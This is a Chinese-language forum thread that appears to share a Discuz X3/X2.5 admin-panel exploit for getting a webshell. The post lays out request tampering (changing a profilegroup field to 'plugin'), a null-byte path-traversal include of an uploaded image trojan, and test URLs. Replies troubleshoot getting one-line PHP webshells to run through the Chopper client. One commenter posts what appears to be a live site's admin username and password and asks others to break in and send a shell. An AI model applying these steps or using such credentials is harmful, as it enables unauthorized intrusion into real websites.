上班后看到wooyun社区发布了一个discuz x3后台拿shell的方法,随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。
好蛋疼的是我测试居然没过,抓到的数据包和给出的案例不一样!!!
经过研究发现,步骤错了。。。。
原帖地址内容:
http://zone.wooyun.org/content/3894
用户 - 用户栏目 - 栏目分组 - 提交 - 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)
Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"
改为
Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"
访问
/home.php?mod=spacecp&id=../../robots.txt%0057
利用:
原帖测试的是dz x3,我测试的是dz x2.5 无视gpc
*********************************************************************
1.首先进后台,抓个包
2.改包
将
Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"
改为
Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"
提交
3.提交过后访问
/home.php?mod=spacecp&id=../../robots.txt%00
4.找个地方上传图片马
5.访问图片马
http://192.168.2.190//home.php?mod=spacecp&id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00
测试好像无效 环境 LINUX DZ 2.5
加载这图片是可以的,加载带PHP代码的就不显示了。 也不报错。
@sinsky Linux环境我没测试。 我测的是win2003+iis6
@honker90 那可能就是了,gpc开了。不知道是不是这个引起的。可能DZ有保护机制。
<? <?php 图片里有这个的直接不显示内容。其它的则正常
@sinsky 你可以尝试把gpc关掉再 测试下
@honker90 没拿到shell 求教 怎么关。。
前面可以成功。后面加载图片
../../static/image/common/logo.png%00
显示??????????????????????????????????????p?????
加载我传上去的forum/201306/10/030536hjt4qjtxig2tis4j.jpg%00
的马就显示?????????????????? 一大堆?号。是不是这种就不行啦。
可是到传马的时候
http://www.z y y o u.com//home.php?mod=spacecp&id=../../data/attachment/forum/201306/10/030536hjt4qjtxig2tis4j.jpg%00
用户名admin 密码 ivwitfk
大大。能否帮进去看看能不能拿下呢。发个shell到我的QQ邮箱呢? 我试了到这一步不行显示 ????这样子
仔细看了一遍,本地搭建 尝试了x3 x2.5 x2 无一成功 x3根本没有生成那个htm x2.5和x2 都提示无法创建模板之类的话 我的PHP版本5.4.16
apache版本2.4.4 麻烦指出到底是哪里错了 我操作系统win7 尝试太多次了 很郁闷。
@luoxlcom 注意看下我文章发布得时间。
@honker90 我明白你的意思 是官方出了补丁 那我还想请问下 有没有其他的思路
@luoxlcom 暂时不知道呢。
phpinfo信息可以显示 一句话无法运行,请教!
@install 为什么非得一句话?
@honker90 我试过PHP小马 ,也没有成功。
请教是否还有测试成功的图片webshell
@install 我测试时一句话是通过的。 记得选择脚本
@honker90 共享一下你的一句话。我这测试N遍全不通过,用的菜刀连接!